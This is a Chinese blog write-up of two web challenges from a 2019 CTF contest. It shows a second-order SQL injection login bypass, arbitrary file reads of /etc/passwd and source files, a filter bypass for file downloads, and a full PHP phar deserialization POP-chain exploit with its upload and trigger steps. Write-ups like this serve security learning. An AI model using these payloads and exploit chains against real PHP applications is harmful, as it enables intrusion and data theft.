c1ay's blog

2019极客巅峰ctf记录

字数统计: 2.7k阅读时长: 14 min
2019/10/20 Share

2019极客巅峰ctf记录

周六抽时间做了2019极客巅峰的ctf,发现自己是真的菜,需要找个地方沉淀一下,所以将做出的题记录记录在博客

aweb_1

mark

提示admin才能看到flag1
mark

发现注册处用户名参数存在二次注入,有过滤,使用`name=admin’//and//‘3`绕过
mark
注册成功,用户名:assssssssss@qq.com,密码:123456’,登录成功,成功获取到flag
mark

upload

这道题线上没做出来,比赛结束后研究了一波,:(
mark

打开题目,首页有三个模块,分别为

查看文件:file.php?file=
mark

上传文件:upload_file.php
mark

下载文件:download.php
mark

下载文件页面泄露了部分的源代码,代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
$name = $_GET['name'];
$url = $_SERVER['QUERY_STRING'];
if (isset($name)){
if (preg_match('/\.|etc|var|tmp|usr/i', $url)){
echo("hacker!");
}
else{
if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
echo ("hacker!");
}
else{
$name = safe_replace($name);
if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
$filename = $name.'.php';
$dir ="./";
$down_host = $_SERVER['HTTP_HOST'].'/';
if(file_exists(__DIR__.'/'.$dir.$filename)){
$file = fopen ( $dir.$filename, "rb" );
Header ( "Content-type: application/octet-stream" );
Header ( "Accept-Ranges: bytes" );
Header ( "Accept-Length: " . filesize ( $dir.$filename ) );
Header ( "Content-Disposition: attachment; filename=" . $filename );
echo fread ( $file, filesize ( $dir . $filename ) );
fclose ( $file );
exit ();
}else{
echo ("file doesn't exist.");
}
}
if (preg_match('/flag/i', $name)){
echo ("hacker!");
}
}
}
}

这里存在文件下载漏洞,但是存在过滤,暂时无法绕过

查看页面源代码发现hint:提示flag文件的位置位于/flag
mark

回过头发现查看文件模块存在任意文件读取:/file.php?file=/etc/passwd
mark

尝试直接读取flag文件。失败:
mark

尝试读取download.php:/file.php?file=download.php读取失败
mark
修改为绝对路径/file.php?file=/var/www/html/download.php,读取成功
mark
完整源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
<html>
<pre>
$name = $_GET['name'];
$url = $_SERVER['QUERY_STRING'];
if (isset($name)){
if (preg_match('/\.|etc|var|tmp|usr/i', $url)){
echo("hacker!");
}
else{
if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
echo ("hacker!");
}
else{
$name = safe_replace($name);
if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
$filename = $name.'.php';
$dir ="./";
$down_host = $_SERVER['HTTP_HOST'].'/';
if(file_exists(__DIR__.'/'.$dir.$filename)){
$file = fopen ( $dir.$filename, "rb" );
Header ( "Content-type: application/octet-stream" );
Header ( "Accept-Ranges: bytes" );
Header ( "Accept-Length: " . filesize ( $dir.$filename ) );
Header ( "Content-Disposition: attachment; filename=" . $filename );
echo fread ( $file, filesize ( $dir . $filename ) );
fclose ( $file );
exit ();
}else{
echo ("file doesn't exist.");
}
}
if (preg_match('/flag/i', $name)){
echo ("hacker!");
}
}
}
}
</pre>
</html>
<?php
$name = $_GET['name'];
$url = $_SERVER['QUERY_STRING'];
if (isset($name)){
if (preg_match('/\.|etc|var|tmp|usr/i', $url)){
echo("hacker!");
}
else{
if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
echo ("hacker!");
}
else{
$name = safe_replace($name);
if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
$filename = $name.'.php'; //获取文件名称
$dir ="./"; //相对于网站根目录的下载目录路径
$down_host = $_SERVER['HTTP_HOST'].'/'; //当前域名
//判断如果文件存在,则跳转到下载路径
if(file_exists(__DIR__.'/'.$dir.$filename)){
$file = fopen ( $dir.$filename, "rb" );
//告诉浏览器这是一个文件流格式的文件
Header ( "Content-type: application/octet-stream" );
//请求范围的度量单位
Header ( "Accept-Ranges: bytes" );
//Content-Length是指定包含于请求或响应中数据的字节长度
Header ( "Accept-Length: " . filesize ( $dir.$filename ) );
//用来告诉浏览器,文件是可以当做附件被下载,下载后的文件名称为$file_name该变量的值。
Header ( "Content-Disposition: attachment; filename=" . $filename );
//读取文件内容并直接输出到浏览器
echo fread ( $file, filesize ( $dir . $filename ) );
fclose ( $file );
exit ();
}else{
echo ("file doesn't exist.");
}
}
if (preg_match('/flag/i', $name)){
echo ("hacker!");
}
}
}
}
//return safe name
function safe_replace($string) {
$string = str_replace('%20','&quot;',$string);
$string = str_replace('%27','&quot;',$string);
$string = str_replace('%2527','&quot;',$string);
$string = str_replace('*','&quot;',$string);
$string = str_replace('"','&quot;',$string);
$string = str_replace("'",'&quot;',$string);
$string = str_replace('"','&quot;',$string);
$string = str_replace(';','&quot;',$string);
$string = str_replace('<','&lt;',$string);
$string = str_replace('>','&gt;',$string);
$string = str_replace("{",'&quot;',$string);
$string = str_replace('}','&quot;',$string);
$string = str_replace('\\','',$string);
return $string;
}

其中可以利用$string = str_replace('\\','',$string);进行文件下载绕过,绕过方法如下:

/download.php?name=ind\\ex
mark

通过文件读取和文件下载结合获取源代码:

index.php

1
2
3
4
5
<?php
header("content-type:text/html;charset=utf-8");
include 'base.php';
?>

base.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?php
session_start();
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>upload_or_not</title>
<link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/css/bootstrap.min.css">
<script src="https://cdn.staticfile.org/jquery/2.1.1/jquery.min.js"></script>
<script src="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/js/bootstrap.min.js"></script>
</head>
<body>
<nav class="navbar navbar-default" role="navigation">
<div class="container-fluid">
<div class="navbar-header">
<a class="navbar-brand" href="index.php">首页</a>
</div>
<ul class="nav navbar-nav navbra-toggle">
<li class="active"><a href="file.php?file=">查看文件</a></li>
<li><a href="upload_file.php">上传文件</a></li>
<li><a href="download.php">下载文件</a></li>
</ul>
<ul class="nav navbar-nav navbar-right">
<li><a href="index.php"><span class="glyphicon glyphicon-user"></span><?php echo $_SERVER['REMOTE_ADDR'];?></a></li>
</ul>
</div>
</nav>
</body>
</html>
<!--flag is in /flag-->

file.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
header("content-type:text/html;charset=utf-8");
include 'function.php';
include 'class.php';
$file = $_GET["file"] ? $_GET['file'] : "";
if(empty($file)) {
echo "<h2>There is no file to show!<h2/>";
}
if(preg_match('/http|https|file:|gopher|dict|\.\/|\.\.|flag/i',$file)) {
die('hacker!');
}elseif(!preg_match('/\//i',$file))
{
die('hacker!');
}
$show = new Show();
if(file_exists($file)) {
$show->source = $file;
$show->_show();
} else if (!empty($file)){
die('file doesn\'t exists.');
}
?>

function.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<?php
//show_source(__FILE__);
include "base.php";
header("Content-type: text/html;charset=utf-8");
error_reporting(0);
function upload_file_do() {
global $_FILES;
$filename = md5($_FILES["file"]["name"]).".jpg";
//mkdir("upload",0777);
if(file_exists("upload/" . $filename)) {
unlink($filename);
}
move_uploaded_file($_FILES["file"]["tmp_name"],"upload/" . $filename);
echo '<script type="text/javascript">alert("上传成功!");</script>';
}
function upload_file() {
global $_FILES;
if(upload_file_check()) {
upload_file_do();
}
}
function upload_file_check() {
global $_FILES;
$allowed_types = array("gif","jpeg","jpg","png");
$temp = explode(".",$_FILES["file"]["name"]);
$extension = end($temp);
if(empty($extension)) {
//echo "<h4>请选择上传的文件:" . "<h4/>";
}
else{
if(in_array($extension,$allowed_types)) {
return true;
}
else {
echo '<script type="text/javascript">alert("Invalid file!");</script>';
return false;
}
}
}
?>

upload_file.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php
include 'function.php';
upload_file();
?>
<html>
<head>
<meta charest="utf-8">
<title>文件上传</title>
</head>
<body>
<div align = "center">
<h1>上传的文件保存在/upload/md5($_FILES["file"]["name"]).".jpg"</h1>
</div>
<style>
p{ margin:0 auto}
</style>
<div>
<form action="upload_file.php" method="post" enctype="multipart/form-data">
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</div>
</body>
</html>

class.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
<html>
<pre>
$name = $_GET['name'];
$url = $_SERVER['QUERY_STRING'];
if (isset($name)){
if (preg_match('/\.|etc|var|tmp|usr/i', $url)){
echo("hacker!");
}
else{
if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
echo ("hacker!");
}
else{
$name = safe_replace($name);
if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
$filename = $name.'.php';
$dir ="./";
$down_host = $_SERVER['HTTP_HOST'].'/';
if(file_exists(__DIR__.'/'.$dir.$filename)){
$file = fopen ( $dir.$filename, "rb" );
Header ( "Content-type: application/octet-stream" );
Header ( "Accept-Ranges: bytes" );
Header ( "Accept-Length: " . filesize ( $dir.$filename ) );
Header ( "Content-Disposition: attachment; filename=" . $filename );
echo fread ( $file, filesize ( $dir . $filename ) );
fclose ( $file );
exit ();
}else{
echo ("file doesn't exist.");
}
}
if (preg_match('/flag/i', $name)){
echo ("hacker!");
}
}
}
}
</pre>
</html>
<?php
class Show
{
public $source;
public $str;
public function __construct($file)
{
$text= $this->source;
$text = base64_encode(file_get_contents($text));
return $text;
}
public function __toString()
{
$text= $this->source;
$text = base64_encode(file_get_contents($text));
return $text;
}
public function __set($key,$value)
{
$this->$key = $value;
}
public function _show()
{
if(preg_match('/http|https|file:|gopher|dict|\.\.|flag/i',$this->source)) {
die('hacker!');
} else {
highlight_file($this->source);
}
}
public function __wakeup()
{
if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
echo "hacker~";
$this->source = "index.php";
}
}
}
class S6ow
{
public $file;
public $params;
public function __construct()
{
$this->params = array();
}
public function __get($key)
{
return $this->params[$key];
}
public function __call($name, $arguments)
{
if($this->{$name})
$this->{$this->{$name}}($arguments);
}
public function file_get($value)
{
echo $this->file;
}
}
class Sh0w
{
public $test;
public $str;
public function __construct($name)
{
$this->str = new Show('index.php');
$this->str->source = $this->test;
}
public function __destruct()
{
$this->str->_show();
}
}
?>

代码审计后发现不能通过文件读取和文件下载直接获取flag,因为这里的过滤无法绕过

通过class.php代码猜测题目应该是考察的应该是php反序列化漏洞,但是并没有找到unserialize函数,不过发现file.php当中以下的代码可能存在phar反序列化漏洞的问题,php一些函数在使用phar伪协议解析phar文件时,会对phar文件当中的meta-data部分进行反序列化,其中file_exists函数就是其中之一
mark

所以这道题的正确思路是应该是通过phar反序列化获取flag,思路如下:

构造pop链,生成phar文件,上传->通过文件读取,使用phar伪协议解析上传的phar文件->触发file_exists函数,产生php反序列化漏洞->通过php反序列化获取flag

构造pop链,生成phar文件:poc如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
<?php
class Show
{
public $source;
public $str;
public function __construct($file)
{
$this->source='/flag';
$text= $this->source;
$text = base64_encode(file_get_contents($text));
return $text;
}
public function __toString()
{
$text= $this->source;
$text = base64_encode(file_get_contents($text));
return $text;
}
public function __set($key,$value)
{
$this->$key = $value;
}
public function _show()
{
if(preg_match('/http|https|file:|gopher|dict|\.\.|flag/i',$this->source)) {
die('hacker!');
} else {
highlight_file($this->source);
}
}
public function __wakeup()
{
if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
echo "hacker~";
$this->source = "index.php";
}
}
}
class S6ow
{
public $file;
public $params;
public function __construct()
{
$this->params = array("_show"=>"file_get");
$this->file=new Show();
}
public function __get($key)
{
return $this->params[$key];
}
public function __call($name, $arguments)
{
if($this->{$name})
$this->{$this->{$name}}($arguments);
}
public function file_get($value)
{
echo $this->file;
}
}
class Sh0w
{
public $test;
public $str;
public function __construct($name)
{
$this->str = new S6ow();
}
public function __destruct()
{
$this->str->_show();
}
}
$phar = new Phar("poc.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$o = new sh0w();
$phar->setMetadata($o); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>

触发过程:

sh0w对象反序列化时调用__destruct,调用了S6ow对象的_show方法,由于_show方法不存在,从而调用了__call,此时$this->{$name}的值变为了_show,在进行$this->{$name}判断时,由于_show属性也不存在,从而触发了__get方法,$this->{$name}的值被赋为file_get,从而调用了file_get函数,由于一开始$this->file的值被设为了Show对象,所以这里将Show对象输出,触发了Show对象的__ToString方法,成功绕过了过滤读取flag

生成phar文件,将后缀重名名为.jpg上传至服务器,通过phar伪协议读取上传后的文件:/file.php?file=phar:///var/www/html/upload/4935ad2c4be6114f4bf09d55ed82a60b.jpg

mark
base64解码后获取到flag
mark

剩下的题目,等待writeup出来后学习

mark

CATALOG
  1. 1. 2019极客巅峰ctf记录
    1. 1.0.1. aweb_1
    2. 1.0.2. upload